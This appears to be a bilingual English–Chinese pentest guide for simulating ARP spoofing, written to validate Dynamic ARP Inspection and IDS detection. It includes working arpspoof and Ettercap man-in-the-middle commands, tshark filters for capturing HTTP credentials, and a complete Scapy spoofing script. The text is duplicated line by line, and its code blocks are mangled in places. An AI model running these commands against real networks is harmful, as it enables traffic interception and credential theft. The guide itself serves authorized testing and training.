performing-arp-spoofing-attack-simulation
Compare original and translation side by side
🇺🇸
Original
English🇨🇳
Translation
ChinesePerforming ARP Spoofing Attack Simulation
ARP欺骗攻击模拟实施
When to Use
适用场景
- Testing whether network switches and infrastructure properly implement Dynamic ARP Inspection (DAI)
- Demonstrating man-in-the-middle attack risks to stakeholders during authorized security assessments
- Validating that network monitoring tools (IDS/IPS, SIEM) detect ARP cache poisoning attempts
- Assessing the effectiveness of port security, 802.1X, and VLAN segmentation controls
- Training SOC analysts to recognize ARP spoofing indicators in network traffic
Do not use on production networks without explicit written authorization and a rollback plan, against networks carrying critical or life-safety traffic, or as a denial-of-service attack vector.
- 测试网络交换机及基础设施是否正确部署动态ARP检测(DAI)
- 在授权安全评估中向利益相关方演示中间人攻击风险
- 验证网络监控工具(IDS/IPS、SIEM)能否检测ARP缓存投毒尝试
- 评估端口安全、802.1X及VLAN分段控制的有效性
- 培训SOC分析师识别网络流量中的ARP欺骗特征
禁止场景:未获得明确书面授权及回滚计划的情况下在生产网络使用;针对承载关键业务或生命安全相关流量的网络使用;作为拒绝服务攻击载体使用。
Prerequisites
前置条件
- Written authorization specifying in-scope network segments for ARP spoofing simulation
- Kali Linux or similar penetration testing distribution with arpspoof, Ettercap, and Scapy installed
- Direct Layer 2 access to the target network segment (same VLAN as target hosts)
- IP forwarding knowledge and ability to enable/disable packet forwarding on the attacker machine
- Wireshark or tcpdump for capturing traffic to verify interception
- Isolated lab environment or approved production test window
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
- 明确ARP欺骗模拟范围网段的书面授权
- 安装有arpspoof、Ettercap和Scapy的Kali Linux或类似渗透测试发行版
- 直接二层访问目标网段(与目标主机同VLAN)
- 具备IP转发知识,能够在攻击机上启用/禁用数据包转发
- 使用Wireshark或tcpdump捕获流量以验证拦截效果
- 隔离的实验室环境或获批的生产测试窗口期
法律声明: 本技能仅用于授权的安全测试和教育目的。未经授权对非自有或未获得书面测试许可的系统使用本技能属于违法行为,可能违反计算机欺诈相关法律。
Workflow
操作流程
Step 1: Enumerate the Target Network Segment
步骤1:枚举目标网段
bash
undefinedbash
undefinedDiscover hosts on the local subnet
发现本地子网中的主机
nmap -sn -PR 192.168.1.0/24 -oG arp_discovery.txt
nmap -sn -PR 192.168.1.0/24 -oG arp_discovery.txt
Identify the default gateway
识别默认网关
ip route show default
ip route show default
Output: default via 192.168.1.1 dev eth0
输出示例: default via 192.168.1.1 dev eth0
Identify target hosts and their MAC addresses
识别目标主机及其MAC地址
arp-scan -l -I eth0
arp-scan -l -I eth0
Verify the current ARP table
验证当前ARP表
arp -a
arp -a
Note the gateway IP (192.168.1.1) and target host IP (192.168.1.50)
记录网关IP(192.168.1.1)和目标主机IP(192.168.1.50)
Record their legitimate MAC addresses for verification and cleanup
记录它们的合法MAC地址,用于验证和清理操作
undefinedundefinedStep 2: Enable IP Forwarding
步骤2:启用IP转发
bash
undefinedbash
undefinedEnable IPv4 forwarding to relay packets between victim and gateway
启用IPv4转发,在受害者与网关之间中继数据包
sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -w net.ipv4.ip_forward=1
Verify forwarding is enabled
验证转发是否启用
cat /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
Should output: 1
应输出: 1
Optionally prevent ICMP redirects that could alert the victim
可选:阻止可能触发受害者警觉的ICMP重定向
sudo sysctl -w net.ipv4.conf.all.send_redirects=0
sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0
undefinedsudo sysctl -w net.ipv4.conf.all.send_redirects=0
sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0
undefinedStep 3: Execute ARP Spoofing with arpspoof
步骤3:使用arpspoof执行ARP欺骗
bash
undefinedbash
undefinedSpoof the gateway to the target (tell target we are the gateway)
向目标主机伪装网关(告知目标主机我们是网关)
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1
In a separate terminal, spoof the target to the gateway (bidirectional)
在另一个终端中,向网关伪装目标主机(双向欺骗)
sudo arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.50
sudo arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.50
Alternative: Use Ettercap for unified bidirectional spoofing
替代方案:使用Ettercap实现统一双向欺骗
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
undefinedsudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
undefinedStep 4: Capture and Analyze Intercepted Traffic
步骤4:捕获并分析拦截的流量
bash
undefinedbash
undefinedCapture all traffic flowing through the attacker machine
捕获流经攻击机的所有流量
sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50
sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50
Use tshark to capture HTTP credentials in real-time
使用tshark实时捕获HTTP凭证
sudo tshark -i eth0 -Y "http.request.method == POST"
-T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value
-T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value
sudo tshark -i eth0 -Y "http.request.method == POST"
-T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value
-T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value
Capture DNS queries from the victim
捕获受害者的DNS查询
sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50"
-T fields -e frame.time -e dns.qry.name
-T fields -e frame.time -e dns.qry.name
sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50"
-T fields -e frame.time -e dns.qry.name
-T fields -e frame.time -e dns.qry.name
Use Ettercap with password collection filters
使用Ettercap搭配密码收集过滤器
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
-w ettercap_capture.pcap
-w ettercap_capture.pcap
undefinedsudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
-w ettercap_capture.pcap
-w ettercap_capture.pcap
undefinedStep 5: Demonstrate Impact with Scapy (Custom ARP Packets)
步骤5:使用Scapy演示攻击影响(自定义ARP数据包)
python
#!/usr/bin/env python3
"""ARP spoofing demonstration using Scapy for authorized security testing."""
from scapy.all import Ether, ARP, sendp, srp, conf
import time
import sys
conf.verb = 0
def get_mac(ip, iface="eth0"):
"""Resolve IP to MAC address via ARP request."""
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
timeout=2, iface=iface)
if ans:
return ans[0][1].hwsrc
return None
def spoof(target_ip, spoof_ip, target_mac, iface="eth0"):
"""Send spoofed ARP reply to target."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
sendp(Ether(dst=target_mac) / packet, iface=iface, verbose=False)
def restore(target_ip, gateway_ip, target_mac, gateway_mac, iface="eth0"):
"""Restore legitimate ARP entries."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
psrc=gateway_ip, hwsrc=gateway_mac)
sendp(Ether(dst=target_mac) / packet, iface=iface, count=5, verbose=False)
if __name__ == "__main__":
target_ip = "192.168.1.50"
gateway_ip = "192.168.1.1"
iface = "eth0"
target_mac = get_mac(target_ip, iface)
gateway_mac = get_mac(gateway_ip, iface)
if not target_mac or not gateway_mac:
print("[!] Could not resolve MAC addresses. Exiting.")
sys.exit(1)
print(f"[*] Target: {target_ip} ({target_mac})")
print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
print("[*] Starting ARP spoofing... Press Ctrl+C to stop.")
try:
packets_sent = 0
while True:
spoof(target_ip, gateway_ip, target_mac, iface)
spoof(gateway_ip, target_ip, gateway_mac, iface)
packets_sent += 2
print(f"\r[*] Packets sent: {packets_sent}", end="")
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Restoring ARP tables...")
restore(target_ip, gateway_ip, target_mac, gateway_mac, iface)
restore(gateway_ip, target_ip, gateway_mac, target_mac, iface)
print("[*] ARP tables restored. Exiting.")python
#!/usr/bin/env python3
"""ARP spoofing demonstration using Scapy for authorized security testing."""
from scapy.all import Ether, ARP, sendp, srp, conf
import time
import sys
conf.verb = 0
def get_mac(ip, iface="eth0"):
"""Resolve IP to MAC address via ARP request."""
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
timeout=2, iface=iface)
if ans:
return ans[0][1].hwsrc
return None
def spoof(target_ip, spoof_ip, target_mac, iface="eth0"):
"""Send spoofed ARP reply to target."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
sendp(Ether(dst=target_mac) / packet, iface=iface, verbose=False)
def restore(target_ip, gateway_ip, target_mac, gateway_mac, iface="eth0"):
"""Restore legitimate ARP entries."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
psrc=gateway_ip, hwsrc=gateway_mac)
sendp(Ether(dst=target_mac) / packet, iface=iface, count=5, verbose=False)
if __name__ == "__main__":
target_ip = "192.168.1.50"
gateway_ip = "192.168.1.1"
iface = "eth0"
target_mac = get_mac(target_ip, iface)
gateway_mac = get_mac(gateway_ip, iface)
if not target_mac or not gateway_mac:
print("[!] Could not resolve MAC addresses. Exiting.")
sys.exit(1)
print(f"[*] Target: {target_ip} ({target_mac})")
print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
print("[*] Starting ARP spoofing... Press Ctrl+C to stop.")
try:
packets_sent = 0
while True:
spoof(target_ip, gateway_ip, target_mac, iface)
spoof(gateway_ip, target_ip, gateway_mac, iface)
packets_sent += 2
print(f"\r[*] Packets sent: {packets_sent}", end="")
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Restoring ARP tables...")
restore(target_ip, gateway_ip, target_mac, gateway_mac, iface)
restore(gateway_ip, target_ip, gateway_mac, target_mac, iface)
print("[*] ARP tables restored. Exiting.")Step 6: Verify Detection and Cleanup
步骤6:验证检测效果并清理
bash
undefinedbash
undefinedOn the target machine, check for ARP cache poisoning indicators
在目标机器上检查ARP缓存投毒特征
arp -a | grep 192.168.1.1
arp -a | grep 192.168.1.1
If spoofed, the gateway MAC will match the attacker's MAC
若被欺骗,网关MAC将与攻击机MAC一致
Check IDS/SIEM for ARP spoofing alerts
检查IDS/SIEM中的ARP欺骗告警
Snort rule that should trigger:
应触发的Snort规则:
alert arp any any -> any any (msg:"ARP Spoof Detected"; arp.opcode:2;
alert arp any any -> any any (msg:"ARP Spoof Detected"; arp.opcode:2;
threshold:type both, track by_src, count 30, seconds 10; sid:1000010;)
threshold:type both, track by_src, count 30, seconds 10; sid:1000010;)
Stop the attack and restore ARP tables
停止攻击并恢复ARP表
Ctrl+C on arpspoof/ettercap sessions
在arpspoof/ettercap会话中按Ctrl+C
Disable IP forwarding
禁用IP转发
sudo sysctl -w net.ipv4.ip_forward=0
sudo sysctl -w net.ipv4.ip_forward=0
Manually restore ARP entries on affected hosts (if needed)
必要时手动恢复受影响主机的ARP条目
On target: arp -d 192.168.1.1 && ping -c 1 192.168.1.1
在目标主机上执行: arp -d 192.168.1.1 && ping -c 1 192.168.1.1
On gateway: arp -d 192.168.1.50 && ping -c 1 192.168.1.50
在网关上执行: arp -d 192.168.1.50 && ping -c 1 192.168.1.50
Verify legitimate MAC addresses are restored
验证合法MAC地址已恢复
arp -a
undefinedarp -a
undefinedKey Concepts
核心概念
| Term | Definition |
|---|---|
| ARP Cache Poisoning | Technique of sending fraudulent ARP replies to associate the attacker's MAC address with another host's IP address in the target's ARP cache |
| Gratuitous ARP | ARP reply sent without a corresponding request, used by ARP spoofing tools to update a target's ARP cache with false entries |
| Dynamic ARP Inspection (DAI) | Switch-level security feature that validates ARP packets against the DHCP snooping binding database and drops invalid ARP traffic |
| IP Forwarding | Kernel-level setting that allows a host to relay packets between network interfaces, required for transparent man-in-the-middle interception |
| DHCP Snooping | Switch security feature that builds a trusted binding table of IP-to-MAC-to-port mappings, serving as the foundation for DAI validation |
| 术语 | 定义 |
|---|---|
| ARP Cache Poisoning | 向目标设备的ARP缓存发送虚假ARP应答,将攻击者的MAC地址与其他主机的IP地址关联起来的技术 |
| Gratuitous ARP | 无需对应请求即可发送的ARP应答,ARP欺骗工具常用其向目标ARP缓存更新虚假条目 |
| Dynamic ARP Inspection (DAI) | 交换机层面的安全功能,可对照DHCP监听绑定数据库验证ARP数据包,丢弃无效ARP流量 |
| IP Forwarding | 内核级设置,允许主机在网络接口之间中继数据包,是透明中间人拦截的必要条件 |
| DHCP Snooping | 交换机安全功能,可构建IP-MAC-端口映射的可信绑定表,是DAI验证的基础 |
Tools & Systems
工具与系统
- arpspoof (dsniff suite): Simple command-line tool that sends continuous spoofed ARP replies to redirect traffic between two targets
- Ettercap: Comprehensive suite for man-in-the-middle attacks supporting ARP spoofing, DNS spoofing, content filtering, and credential capture
- Scapy: Python packet manipulation library for crafting custom ARP packets with full control over all header fields
- arp-scan: Network scanning tool that sends ARP requests to discover all hosts on a local network segment
- Wireshark: Packet analyzer for verifying ARP spoofing success and capturing intercepted traffic for analysis
- arpspoof (dsniff suite):简单的命令行工具,可发送持续的虚假ARP应答以重定向两个目标之间的流量
- Ettercap:综合性中间人攻击工具集,支持ARP欺骗、DNS欺骗、内容过滤及凭证捕获
- Scapy:Python数据包操作库,可定制ARP数据包,完全控制所有头部字段
- arp-scan:网络扫描工具,通过发送ARP请求发现本地网段内的所有主机
- Wireshark:数据包分析器,用于验证ARP欺骗是否成功,并捕获拦截的流量进行分析
Common Scenarios
常见场景
Scenario: Testing Dynamic ARP Inspection Effectiveness on Enterprise Switches
场景:测试企业交换机上动态ARP检测的有效性
Context: A network team deployed Cisco DAI on all access-layer switches and needs to validate that ARP spoofing attempts are properly detected and blocked. The test is authorized on a dedicated VLAN (VLAN 100) with three test hosts and one attacker machine connected to the same switch.
Approach:
- Document baseline ARP tables on all hosts and the legitimate MAC-IP bindings in the DHCP snooping database
- Run arpspoof from the attacker machine targeting the default gateway and a test workstation
- Verify that the switch drops spoofed ARP packets by checking DAI statistics:
show ip arp inspection statistics vlan 100 - Confirm the test workstation's ARP cache still shows the legitimate gateway MAC address
- Temporarily disable DAI on the test VLAN and repeat the attack to confirm it succeeds without the control
- Re-enable DAI and document results showing the control is effective
- Verify that IDS alerts were generated for both the blocked and unblocked attack attempts
Pitfalls:
- Running ARP spoofing on a VLAN without DAI and accidentally disrupting legitimate traffic
- Forgetting to enable IP forwarding, causing a denial-of-service instead of transparent interception
- Not restoring ARP tables after testing, leaving hosts with stale cache entries
- Testing on a trunk port instead of an access port, potentially affecting multiple VLANs
背景:某网络团队在所有接入层交换机上部署了Cisco DAI,需要验证ARP欺骗尝试能否被正确检测和拦截。测试在专用VLAN(VLAN 100)上授权进行,该VLAN包含三台测试主机和一台连接到同一交换机的攻击机。
实施步骤:
- 记录所有主机的基线ARP表,以及DHCP监听数据库中的合法MAC-IP绑定关系
- 在攻击机上运行arpspoof,针对默认网关和一台测试工作站发起攻击
- 通过查看DAI统计信息,验证交换机是否丢弃了虚假ARP数据包
show ip arp inspection statistics vlan 100 - 确认测试工作站的ARP缓存仍显示网关的合法MAC地址
- 临时禁用测试VLAN的DAI,重复攻击以确认无防护时攻击成功
- 重新启用DAI,记录结果以证明该防护措施有效
- 验证IDS针对拦截和未拦截的攻击尝试均生成了告警
注意事项:
- 在未部署DAI的VLAN上运行ARP欺骗,可能意外中断合法流量
- 忘记启用IP转发,导致拒绝服务而非透明拦截
- 测试后未恢复ARP表,导致主机缓存条目失效
- 在 trunk 端口而非 access 端口进行测试,可能影响多个VLAN
Output Format
输出格式
undefinedundefinedARP Spoofing Simulation Report
ARP欺骗模拟测试报告
Test ID: NET-ARP-001
Date: 2024-03-15 14:00-15:00 UTC
Target VLAN: VLAN 100 (192.168.1.0/24)
Attacker: 192.168.1.99 (AA:BB:CC:DD:EE:FF)
Target: 192.168.1.50 (00:11:22:33:44:55)
Gateway: 192.168.1.1 (00:AA:BB:CC:DD:01)
测试ID: NET-ARP-001
日期: 2024-03-15 14:00-15:00 UTC
目标VLAN: VLAN 100 (192.168.1.0/24)
攻击机: 192.168.1.99 (AA:BB:CC:DD:EE:FF)
目标主机: 192.168.1.50 (00:11:22:33:44:55)
网关: 192.168.1.1 (00:AA:BB:CC:DD:01)
Test Results
测试结果
| Test | DAI Status | ARP Spoof Result | Traffic Intercepted |
|---|---|---|---|
| Test 1 | Enabled | Blocked (switch dropped 847 packets) | No |
| Test 2 | Disabled | Successful (target ARP cache poisoned) | Yes - 23 HTTP sessions |
| Test 3 | Re-enabled | Blocked | No |
| 测试项 | DAI状态 | ARP欺骗结果 | 流量拦截情况 |
|---|---|---|---|
| 测试1 | 启用 | 被拦截(交换机丢弃847个数据包) | 否 |
| 测试2 | 禁用 | 成功(目标ARP缓存被投毒) | 是 - 23个HTTP会话 |
| 测试3 | 重新启用 | 被拦截 | 否 |
Detection Coverage
检测覆盖情况
- DAI: PASS - Dropped all spoofed ARP replies when enabled
- IDS (Snort): PASS - Generated alert SID:1000010 within 15 seconds
- SIEM: PASS - Alert correlated and escalated within 2 minutes
- DAI: 通过 - 启用时丢弃所有虚假ARP应答
- IDS (Snort): 通过 - 15秒内生成告警SID:1000010
- SIEM: 通过 - 告警在2分钟内完成关联并升级
Recommendations
建议
- Maintain DAI enabled on all access VLANs (currently disabled on VLANs 200, 210)
- Enable DHCP snooping rate limiting to prevent DHCP starvation attacks
- Deploy 802.1X port authentication to complement ARP inspection
undefined- 在所有接入VLAN上保持DAI启用(当前VLAN 200、210未启用)
- 启用DHCP监听速率限制,防止DHCP耗尽攻击
- 部署802.1X端口认证,补充ARP检测防护
undefined